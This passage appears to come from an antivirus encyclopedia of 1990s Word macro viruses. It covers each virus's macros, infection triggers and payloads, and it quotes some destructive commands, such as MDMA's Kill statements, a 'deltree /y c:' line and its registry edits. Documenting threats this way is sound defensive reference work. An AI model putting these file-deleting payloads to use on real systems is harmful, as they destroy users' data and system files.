AutoExec, FileOpen, FileSaveAs, FilePrintDefault, ToolsMacro Size of macros: 972 Bytes Place of origin: Unknown Date of origin: February 1997 Destructive: Yes Common In-The-Wild: No Description: Kerrang activates when an infected document is opened. After the global template becomes infected, it disables the Microsoft Word virus protection every time Microsoft Word is started (AutoExec). Further documents become infected when they are saved with the FileSave and FileSaveAs commands. Kerrang uses "ToolsMacro" to make recognition of an infected file more difficult (called macro stealth technique). When the user selects this option, Kerrang creates 65 new documents. Kerrang has various payloads. It checks for the system time and if the time is 18:00 (6:00 p.m.) is adds the following text to the printed document: " Kerbaffely Urgo Kerranga! Kerranga!!!! " After that it launches its second payload which deletes all files with the extension *.DOC in the current directory. [WORD_KillDll.A] Virus name: WORD_KillDll.A Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 284 Bytes Place of origin: Unknown Date of origin: Summer 1996 Destructive: Yes Common In-The-Wild: No Description: KillDLL activates when an infected document is opened (AutoOpen). KillDLL is one of the very few destructive viruses. Upon each startup of Word, it will delete all files in the WINDOWS directory, matching the extensions: *.D?? Affected are mostly .DLL files and .DRV files, which are essential for Microsoft Windows. [WORD_KillPort.A] Virus name: WORD_KillProt.A Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: AutoExec, FileOpen, FileSaveAs, ToolsMacro Size of macros: 2272 Bytes Place of origin: Unknown Date of origin: 1997 Payload: Yes Common In-The-Wild: No Description: KillProt.A infects the global template when an infected document is opened (FileOpen) or the ToolsMacro command is selected. Further documents become infected when they are opened (FileOpen) or saved (FileSaveAs). KillProt's name was chosen because KillProt deletes the following macros: "AutoExit" "InstVer" "ShellOpen" All of them are located in the anti-virus macro solution "ScanProt". KillProt also modifies .INI settings in the Windows directory. It creates the entry "Count=xxx" under the "Infector" section. Whenever a document is saved with the FileSaveAs command, KillProt increments the value. The payload triggers whenever 10 documents have been saved. It then adds the following password to the saved document: " WhatTheHell " [WORD_MVDK1(Kit)] Virus Kit Name: WORD_MVDK1 (Kit) Virus Type: Word macro virus Size of document: 23618 Bytes Number of macros: 5 Place of origin: Russia Date of origin: Summer 1996 Description: MVDK does not generate ready-to-run viruses. It only creates the source code, which is put into text format and saved in the C:\ directory. Infected documents have to be created by the author himself. The function to infect the global template and documents is placed in one main macro, named by the virus creator. The AutoOpen macro is always present, while other infection methods can be added (infection on FileOpen, FileNew and FileSave). MVDK offers various payloads: 1. deleting system files 2. saving files with a password (on certain date and time) 3. dropping a DOS based program (or virus) As a result of the payloads, "FileSaveAs" and "PayLoad" can also be present in the virus code. [WORD_Kompu.A] Virus name: WORD_Kompu.A Virus Type: Word macro virus Alias: WORD_MakroKompu Number of macros: 2 Encrypted: No Macro names: AutoOpen, AutoClose Size of macros: 517 Bytes Place of origin: ?Russia? Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: Kompu infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened or closed. On the 6th and 8th of each month, Kompu displays the following message: " Tahan kommi!, Mul on paha tuju! " It then waits for an input from the user. To close the message box, the user needs to enter the following text: " komm " Kompu also adds the following message to a printed document: " Naemm-Naemm-Naemm-Naemm-Amps-Amps-Amps- Amps-Kloemps-Kroeoek! " [WORD8_MakroKompu] Virus name: WORD_MakroKompu Virus Type: Word macro virus Alias: WORD_Kompu.A Platform: Office 97 Number of macros: 2 Encrypted: No Macro names: AutoOpen, AutoClose Size of macros: 517 Bytes Place of origin: ?Russia? Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: Kompu infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened or closed. On the 6th and 8th of each month, Kompu displays the following message: " Tahan kommi!, Mul on paha tuju! " It then waits for an input from the user. To close the message box, the user needs to enter the following text: " komm " Kompu also adds the following message to a printed document: " Naemm-Naemm-Naemm-Naemm-Amps-Amps-Amps- Amps-Kloemps-Kroeoek! " [WORD_Lazy.A] Virus name: WORD_Lazy.A Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen, Lazy Size of macros: 664 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Lazy infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). When Lazy triggers (Friday 13th), it sets a password to the active document. If you find a document with an unknown password, please download a copy of WinWord Password Recovery Tool (wwprt). It is available at: www.vdsarg.cow. [WORD_Lemon.A (aka Melon)] Virus name: WORD_Lemon.A (aka Melon) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen, Lemon (Melon) Size of macros: 664 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Lemon.A infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). When Lemon triggers (probability of 1/31), it displays the following message: " !!LEMON!!!!MELON!! " " !!LEMON!!!!MELON!! " [WORD_Lemon.B] Virus name: WORD_Lemon.B Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 577 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: No Seen In-The-Wild: No Description: Lemon.B infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). Lemon.B removes "ExtrasMakro" to make recognition of an infected document more difficult (called macro stealth technique). [WORD_Lunch.A] Virus name: WORD_Lunch.A Virus Type: Word macro virus Alias: WORD_Nch Number of Variants: 10 Number of macros: 3 Encrypted: No Macro names: AutoOpen (FileSave), NEWAO, NEWFS Size of macros: 1579 Bytes in .doc files 1718 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: Lunch infects the global template (normal.dot) when an infected document is opened. The "AutoOpen" macro is renamed to "FileSave" when Lunch infects the global template. As a result, further documents become infected when they are saved with the FileSave command. When an infected document is saved at 12:01 pm, Lunch displays the following message: " !Whatya doin'here? Take a lunch break! " [WORD_Nch] Virus name: WORD_Nch Virus Type: Word macro virus Alias: WORD_Lunch.A Number of Variants: 10 Number of macros: 3 Encrypted: No Macro names: AutoOpen (FileSave), NEWAO, NEWFS Size of macros: 1579 Bytes in .doc files 1718 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: Nch infects the global template (normal.dot) when an infected document is opened. The "AutoOpen" macro is renamed to "FileSave" when Nch infects the global template. As a result, further documents become infected when they are saved with the FileSave command. When an infected document is saved at 12:01 pm, Nch displays the following message: " !Whatya doin'here? Take a lunch break! " [WORD_Lunch.B] Virus name: WORD_Lunch.B Virus Type: Word macro virus Number of macros: 3 Encrypted: No Macro names: AutoOpen (FileSave), NEWAO, NEWFS Size of macros: 1375 Bytes in .doc files 1463 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: The difference between this new variant and the original Lunch.A virus is that Lunch.B does not check for the presence of the "FileOpen" and "AutoExit" macros. Instead it checks for the presence of the "FileSave" macro before infecting the global template (normal.dot). For more information, please refer to the Lunch.A virus. [WORD_Maddog.A] Virus name: WORD_Maddog.A Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoOpen, AutoClose, AutoExec, FileClose, AopnFinish, FcFinish Size of macros: 4209 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: No Description: MadDog.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened and closed (FileClose). Upon closing a document, MadDog.A saves various times to "Temp.dot" and then saves the active document. It also creates the following file in the active directory: " Filename.dat " When a user closes a document (AutoClose) between 8 and 9 PM, Maddog.A replaces the letter "e" with "a". [WORD_Maddog.B] Virus name: WORD_Maddog.B Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoOpen, AutoClose, AutoExec, FileClose, AopnFinish, FcFinish Size of macros: 4259 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: Yes Common In-The-Wild: Yes Description: The difference between this new variant and the original Maddog.A virus is that the code has been slightly modified. MadDog.B infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened and closed (FileClose). Upon closing a document, MadDog.B saves various times to "Temp.dot" and then saves the active document. It also creates the following file in the active directory: " Filename.dat " When a user closes a document (AutoClose) between 8 and 9 PM, Maddog.B replaces the letter "e" with "a". [WORD_MDMA.A (a.k.a. StickyKeys, MDMA_DMV)] Virus name: WORD_MDMA.A (a.k.a. StickyKeys, MDMA_DMV) Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 1635 Bytes Place of origin: USA Date of origin: July 1996 Destructive: Yes Common In-The-Wild: Yes Description: MDMA is the first macro virus that tries to work on Windows, Windows 95, Macintosh and Windows NT. It can be a very destructive virus, and Word users are strongly advised to check their system with an up-to-date anti-virus program. MDMA infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed ("AutoClose"). If an infected document is loaded on the first of each month, MDMA activates its destructive payload. Due to a bug in the code MDMA will always call the Windows 95 payload, even though there are other payloads for other operating systems. Below are all the payloads: Windows: -------- Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat This will delete all the directories on the C:\ drive. Windows NT: ----------- Kill "*.*"; Kill "c:\shmk." This will delete all the files on the C:\ drive Macintosh: ---------- Kill MacID$("****") This will delete all files on the hard drive. Windows 95: ----------- Kill "c" \shmk."; Kill "c:\windows\*.hlp"; Kill "c:\windows\system\*.cpl" SetPrivateProfileString ("HKEY_CURRENT_USER\Control Panel\Accessibility\Stickykeys", "On", "1", "") SetPrivateProfileString ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","") SetPrivateProfileString ("HKEY_CURRENT_USER\Control Panel\Accessibility\HighContrst", "On", "1", "") This will delete important Windows files. MDMA will also display the following message: " You are infected with MDMA_DMV. Brought to you by MDMA " " (Many Delinquent Modern Anarchists). " [WORD_MDMA.B (a.k.a. StickyKeys, MDMA_DMV)] Virus name: WORD_MDMA.B (a.k.a. StickyKeys, MDMA_DMV) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 1635 Bytes Place of origin: USA Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and the older MDMA.A virus is that its payload is corrupted. Microsoft Word does not care about corrupted macros, therefore MDMA.B is still able to replicate. MDMA.B infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed ("AutoClose"). [WORD_MDMA.C (a.k.a. StickyKeys, MDMA_DMV)] Virus name: WORD_MDMA.C (a.k.a. StickyKeys, MDMA_DMV) Virus Type: Word macro virus Alias: WORD_Shmk Number of Variants: 13 Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 1025 Bytes Place of origin: USA Date of origin: October 1996 Destructive: Yes Common In-The-Wild: No Description: The main difference between this new variant and the older MDMA.A virus is that the code was partially modified. MDMA.C infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed ("AutoClose"). Upon closing a document after the 20th of each month, MDMA.C triggers its destructive payload. It tries to delete the following files: C:\shmk. all *.hlp (Help) files in the C:\Windows directory all *.cpl files in the C:\Windows\System directory Again, MDMA.C has a payload for the Macintosh, which is never executed. [WORD_Shmk] Virus name: WORD_Shmk Virus Type: Word macro virus Alias: WORD_MDMA.C/D/E/M Number of Variants: 13 Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 1025 Bytes Place of origin: USA Date of origin: October 1996 Destructive: Yes Common In-The-Wild: No Description: Shmk infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed ("AutoClose"). Upon closing a document after the 20th of each month, Shmk triggers its destructive payload. It tries to delete the following files: C:\shmk. all *.hlp (Help) files in the C:\Windows directory all *.cpl files in the C:\Windows\System directory Again, Shmk has a payload for the Macintosh, which is never executed. [WORD_MDMA.D (a.k.a. StickyKeys, MDMA_DMV)] Virus name: WORD_MDMA.D (a.k.a. StickyKeys, MDMA_DMV) Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 744 Bytes Place of origin: USA Date of origin: October 1996 Destructive: No Common In-The-Wild: Yes Description: The main difference between this new variant and the older MDMA.C virus is that some of the codes are missing. MDMA.D infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed ("AutoClose"). While MDMA.C tries to delete certain files after the 20th of each month, MDMA.D does not contain this destructive payload. It only has a payload for the Macintosh, which is never executed. [WORD_MDMA.E (a.k.a. StickyKeys, MDMA_DMV)] Virus name: WORD_MDMA.E (a.k.a. StickyKeys, MDMA_DMV) Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 735 Bytes Place of origin: USA Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and the older MDMA.D virus is that some of the codes are missing. MDMA.E infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed ("AutoClose"). While some other MDMA variants contain destructive payloads, MDMA.E does not delete any files. [WORD_Mind.A (aka Puritan)] Virus name: WORD_Mind.A (aka Puritan) Virus Type: Word macro virus Number of macros: 6 or 1 Encrypted: No Macro names: AOB, FSAB, Retro, Puritan, FileSaveAs, ToolsMacro Size of macros: 5415 (Mind.A) or 753 (Mind.A1) Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Mind.A (Mind.A1) is another virus that is not capable of infecting other documents. Therefore, it is highly unlikely that people will run into infected documents with the Mind virus. [WORD_Mota.A] Virus name: WORD_Mota.A Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: No2, AutoExec, AutoOpen, FileExit, FileSaveAs Size of macros: 1578 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Mota infects the global template when an infected document is opened. Further documents become infected when they are saved (FileSaveAs). Upon "FileExit", Mota disables the anti-virus protection of Microsoft Word 7.0 and the warning message before saving the global template (normal.dot). When Microsoft Word is started (AutoExec) from an infected global template, Mota adds the following text to the active document: " Mota grows.. " [WORD_Muck.A] Virus name: WORD_Muck.A Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave FileSaveAs Size of macros: 5329 Bytes Place of origin: Africa Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Muck infects the global template when an infected document is opened. Further documents become infected when they are saved (FileSave and FileSaveAs). Muck is another virus that is not destructive, it just displays the message " Muck " with a probability of 1/5. Muck also contains a code from an ineffective macro anti-virus solution. The macros "AutoClose", "AutoExit" and "AutoNew" have been snatched from ScanProt. [WORD_Muck.B] Virus name: WORD_Muck.B Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave FileSaveAs Size of macros: 2781 Bytes Place of origin: Africa Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Muck.B infects the global template when an infected document is opened. Further documents become infected when they are saved (FileSave and FileSaveAs). The main difference between this new variant and the original Muck.A virus it that this new variant snatched other macros from the ScanProt macro anti-virus solution (AutoClose and AutoNew). Muck.B is another virus that is not destructive, it just displays the message " Muck " with a probability of 1/5. [WORD_Muck.C] Virus name: WORD_Muck.C Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave FileSaveAs Size of macros: 4327 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Muck.C infects the global template when an infected document is opened. Further documents become infected when they are saved (FileSave and FileSaveAs). The main difference between this new variant and the original Muck.A virus it that Muck.C has some minor code changes. The AutoClose and AutoNew macros are identical to the ones found in Muck.B virus. Muck.C is another virus that is not destructive, it just displays the message " Muck " with a probability of 1/5. [WORD_Muck.D] Virus name: WORD_Muck.D Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave FileSaveAs Size of macros: 1619 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Muck.D infects the global template when an infected document is opened. Further documents become infected when they are saved (FileSave and FileSaveAs). The main difference between this new variant and the previous Muck.A virus it that Muck.D has some minor code changes. The AutoNew macro is new, while the AutoExit macro was taken from the B variant. Muck.D also exists as a Word 97 virus. It was converted from an older version of Word (6.0 or 7.0) to Word 8.0! Muck.D is another virus that is not destructive, it just displays the message " Muck " with a probability of 1/5. [WORD_Muck.E] Virus name: WORD_Muck.E Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave FileSaveAs Size of macros: 1648 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Muck.E infects the global template when an infected document is opened. Further documents become infected when they are saved (FileSave and FileSaveAs). The main difference between this new variant and the previous Muck.B virus it that Muck.E has some minor code changes. Muck.E is another virus that is not destructive, it just displays the message " Muck " with a probability of 1/5. [WORD_NF.A (a.k.a. Names)] Virus name: WORD_NF.A (a.k.a. Names) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoClose, NF Size of macros: 286 Bytes Place of origin: USA Date of origin: Summer 1996 Destructive: No Common In-The-Wild: No Description: NF infects documents that are closed (AutoClose). Infected documents are converted internally to templates which is very common for macro viruses. Upon infection, NF will display the following message at the bottom of the screen: " Traced! " [WORD_Niceday.A] Virus name: WORD_Niceday.A Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, VOpen, AutoClose Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: Niceday infects the global template (normal.dot) when an infected file is opened. Further documents become infected when they are closed (AutoClose). Niceday triggers every day of the year and displays the following message: " Have a Nice Day " Niceday includes parts of the Concept virus. The "Payload" macro is identical to the one located in the Concept.A virus. [WORD_Niceday.B] Virus name: WORD_Niceday.B Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Winter 1996 Destructive: No Seen In-The-Wild: No Description: Niceday.B infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and the previous Niceday.A virus is that Niceday.B has some modified codes. [WORD_Niceday.C] Virus name: WORD_Niceday.C Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Winter 1996 Destructive: No Seen In-The-Wild: No Description: Niceday.C infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and the previous Niceday.A virus is that Niceday.C has some corrupted codes. [WORD_Niceday.D] Virus name: WORD_Niceday.D Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Niceday.D infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and the previous Niceday.A virus is that Niceday.D has a corrupted "Payload" macro. [WORD_Niceday.E] Virus name: WORD_Niceday.E Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Niceday.E infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and the previous Niceday.A virus is that Niceday.E has a corrupted "Payload" and "AutoExit" macros. [WORD_Niceday.F] Virus name: WORD_Niceday.F Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: Yes Description: Niceday.F infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and previous Niceday viruses is that Niceday.F has a differently corrupted "AutoExit" macro. [WORD_Niceday.G] Virus name: WORD_Niceday.G Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 910 Bytes Place of origin: Spain Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Niceday.G infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and previous Niceday viruses is that Niceday.G has a different message. It displays " Pepe Truene, The mooooooooore Faster" instead of " Have a NiceDay!". Niceday.G also has an additional comment in the "AutoClose" macro. [WORD_Niceday.H] Virus name: WORD_Niceday.H Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Niceday.H infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and previous Niceday viruses is that Niceday.H has a differently corrupted "Payload" macro. [WORD_Niceday.I] Virus name: WORD_Niceday.I Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Niceday.I infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and previous Niceday viruses is that Niceday.I has some differently corrupted macros. [WORD_Niceday.J] Virus name: WORD_Niceday.J Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Niceday.J infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and previous Niceday viruses is that Niceday.J has a differently corrupted "Payload" macro. [WORD_Niceday.K] Virus name: WORD_Niceday.K Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 886 Bytes Place of origin: Unknown Date of origin: June 1997 Destructive: No Seen In-The-Wild: No Description: Niceday.K infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and previous Niceday viruses is that Niceday.K has a differently corrupted "AutoExit" macro. [WORD_Niceday.L] Virus name: WORD_Niceday.L Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Size of macros: 909 Bytes Place of origin: Unknown Date of origin: June 1997 Destructive: No Seen In-The-Wild: No Description: Niceday.L infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). The main difference between this new variant and the previous Niceday.D virus is that Niceday.L has a different message. It displays " Your files will be deleted in 24 hours " instead of " Have a NiceDay!". [WORD_Niki.A] Virus name: WORD_Niki.A Virus Type: Word macro virus Number of macros: 6 Encrypted: Yes Macro names: AutoExec, AutoOpen, FileApri, FileSalvaConNome, StrumMacro, NiKi Size of macros: 7939 Bytes Place of origin: Italy Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: Niki is another macro virus for the Italian version of Microsoft Word. Niki infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened (FileApri) and saved (FileSalvaConNome). When the "NiKi" macro is activated, Niki deletes all .doc files and all .dll files in the following directories: C:\MSOFFICE C:\WINDOWS\SYSTEM [WORD_Nikita.A and WORD_Nikita.A1] Virus name: WORD_Nikita.A and WORD_Nikita.A1 Virus Type: Word macro virus Number of macros: 2 or 1 Encrypted: Yes Macro names: AutoOpen, Fun Size of macros: 1028 Bytes in .doc files 309 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: Nikita is a trojan, not a virus. It does not replicate. Nikita activates when an infected document is opened. It displays a face, with moving eyes and mouth, and the following text: " Hello Guys! Oh, please stay here and look! " (the text is only available in the original trojanized document) Upon activation, the "Fun" macro is saved in the global template under the name "AutoOpen". Once a new document is opened (from an infected document) the payload triggers and Nikita creates files, slowly filling the hard drive. The files contain the following text: " Nikita (1997) Nightmare Joker [SLAM] " [WORD_NJ-WMDLK1.A (a.k.a. BlackKnight)] Virus name: WORD_NJ-WMDLK1.A (a.k.a. BlackKnight) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: DQEQDIDT, GPDRCQJZ Size of macros: 3680 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: NJ-WMDLK1.A infects the global template (normal.dot) when an infected document is opened and the following key is pressed: " SPACE " assigned to the DQEQDIDT macro Further documents become infected when " SPACE " is pressed again. NJ-WMDLK1.A is very obvious to the user. Whenever " SPACE " is pressed, the letter " E " will appear and when " E " is pressed, an empty space (spacebar function) will appear. This virus was distributed with NJ-WMDLK1.B and NJ-WMDLK1.C inside a macro virus construction kit. The kit is available in 5 different versions and is capable of creating macro viruses and macro trojans. [WORD_NJ-WMDLK1.B (a.k.a. BlackEnd)] Virus name: WORD_NJ-WMDLK1.B (a.k.a. BlackEnd) Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd Size of macros: 2102 Bytes Place of origin: Unknown Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: NJ-WMDLK1.B infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen), closed (AutoClose), Microsoft Word started (AutoExec), and when a new file is created (AutoNew). On May 22nd of each year, Nj-WMDLK1.B activates its payload and inserts the following text to a newly created template: " You are infected with the BlackEbd Virus! [D.K.] After that is creates the following batch file and launches it: C:\DOSSYS.BAT The file contains the following: " echo off " " doskey Fun=setver win.com 3.00 " " echo off " " Fun " This virus was distributed with NJ-WMDLK1.A and NJ-WMDLK1.C inside a macro virus construction kit. The kit is available in 5 different versions and is capable of creating macro viruses and macro trojans. [WORD_NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen)] Virus Kit Name: WORD_NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen) Virus Type: Word macro virus Size of macros: 264915 Bytes Number of macros: 20 Place of origin: Germany Date of origin: July 1996 Description: This macro virus construction kit was the first one to appear during the Summer of 1996. It was written in Germany and only works with the German version of Microsoft Word. All viruses, created with the kit, have the following common characteristics: 1. Consist of 7 or 8 macros 2. 7 macros have fixed names 3. Last macro name is chosen by the user The kit offers to drop 9 predefined DOS-based viruses upon activation. Due to a bug in the macro code only the dropper for the BOZA.C virus works. Boza.C is classified as an intended virus and does not infect any user files. However, the chance of corruption still exists. All the viruses check the system time and if the value of the second field is 10, the following text is added to the printed document: " Nightmare Joker's WMVCK " The construction kit also offers to add some additional text to the printed document. The construction kit user only needs to type in the text when creating the virus. Below are the viruses that can be created with the kit: 1. WMVCK.Casino - This variant will drop Casino.2330. 2. WMVCK.VLS - This variant will drop VCL.Markt.1533. 3. WMVCK.MTE - This variant will drop MTE.Shocker. 4. WMVCK.Sirius - This variant will drop Sirius.Alive.4608. 5. WMVCK.SMEG - This variant will drop SMEG.Queeg. 6. WMVCK.Tequila - This variant will drop Tequila. 7. WMVCK.VICE - This variant will drop VICE.05.Code.3952. 8. WMVCK.Uniform - This variant will drop Uniform. 9. WMVCK.Boza.C - This variant will drop Boza. 10. WMVCK.Tremor - This variant will drop Tremor. 11. WMVCK.NoDrop - This variant will not drop any virus. [WORD_NJ-WMDLK1.C (a.k.a. Grunt)] Virus name: WORD_NJ-WMDLK1.C (a.k.a. Grunt) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: XxGRUNTxX1, XxGRUNTxX2 Size of macros: 1461 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: NJ-WMDLK1.C infects the global template (normal.dot) when an infected document is opened and one of the following keys is pressed: " E " assigned to the XxGRUNTxX1 macro " I " assigned to the XxGRUNTxX2 macro Further documents become infected when again " E " or " I " is pressed. The following text can be found inside the virus: " A Virus from Nightmare Joker's Demolition Kit! " This virus was distributed with NJ-WMDLK1.A and NJ-WMDLK1.B inside a macro virus construction kit. The kit is available in 5 different versions and is capable of creating macro viruses and macro trojans. [WORD_NJ-WMDLK1.D (a.k.a. Archie)] Virus name: WORD_NJ-WMDLK1.D (a.k.a. Archie) Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd Size of macros: 2102 Bytes Place of origin: Unknown Date of origin: Unknown Payload: No Seen In-The-Wild: No Description: NJ-WMDLK1.D infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen), closed (AutoClose), Microsoft Word started (AutoExec), and when a new file is created (AutoNew). This virus is another virus created with a macro virus construction kit. The original kit is available in 5 different versions and is capable of creating macro viruses and macro trojans. The following text can be found in the "Archie" macro: " A Virus from Nightmare Joker's Demolition Kit! " " Translated into English by Dark Night (VBB) " [WORD_Nomvir.A:De] Virus name: WORD_Nomvir.A:De Virus Type: Word macro virus Number of macros: 10 Encrypted: Yes Macro names: AutoExec, AutoNew, AutoOpen, DateiSpeichern, DateiSpeichernUnter, DateiBeenden, ExtrasOptionen, DateiDokvorlagen, DateiDrucken, FuckIt, Size of macros: 5660 Bytes Place of origin: Germany Date of origin: January 1997 Payload: Yes Seen In-The-Wild: No Description: 